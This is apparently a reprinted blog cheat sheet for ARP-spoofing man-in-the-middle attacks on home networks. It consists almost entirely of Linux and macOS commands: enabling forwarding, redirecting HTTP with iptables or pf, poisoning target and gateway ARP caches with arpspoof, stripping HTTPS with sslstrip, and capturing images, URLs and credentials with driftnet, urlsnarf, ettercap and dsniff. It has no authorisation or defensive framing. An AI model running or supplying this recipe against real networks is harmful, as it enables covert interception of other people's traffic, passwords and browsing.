ARP Spoofing to Obtain Device Information

Man-in-the-middle attack and data acquisition on home routers.

Introduction to ARP Process

Linux

# Enable port forwarding
echo 1 >/proc/sys/net/ipv4/ip_forward
# Monitor images
driftnet -i eth0 -d ~/Desktop/pic -a
driftnet -i eth0
# Monitor URLs
urlsnarf -i eth0
# Forward through iptables

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

# Spoof target machine
arpspoof  -i eth0 -t 192.168.2.165 192.168.2.1
# Spoof gateway
arpspoof -i eth0  -t 192.168.2.1 192.168.2.150

# Filter spoofing
arpspoof -i eth0 -c own -t 192.168.2.213 192.168.2.1

## sslstrip -l  <yourListenPort>
# Intercept data
sslstrip
## Start packet capture tool
wirewhark

Mac

rdr pass on en0 proto tcp from any to any port 80 -> 127.0.0.1 port 8080

sslstrip -l 8080

# Modify /etc/pf.conf file, add the following line at the appropriate location
rdr-anchor "http-forwarding"

load anchor "http-forwarding" from "/etc/pf.anchors/http"

# Restart the packet filter, enter the following commands
sudo pfctl -ef /etc/pf.conf
sudo pfctl -E

# Enable forwarding
sudo sysctl -w net.inet.ip.forwarding=1
# Check forwarding status
sudo sysctl -a | grep forward

# arpspoof -i en0 -t (target IP) (gateway IP)
arpspoof -i en0 -t 10.196.17.58 10.196.17.1

arpspoof -i en0 -t 10.196.17.1 10.196.17.24

# Capture traffic
sudo ettercap -G
# Select target1

# Gateway spoofing
dsniff -i eth0

Filter

ip.src==192.168.2.213 and http

Please indicate the source when reprinting. This article is licensed under the CC4.0 license.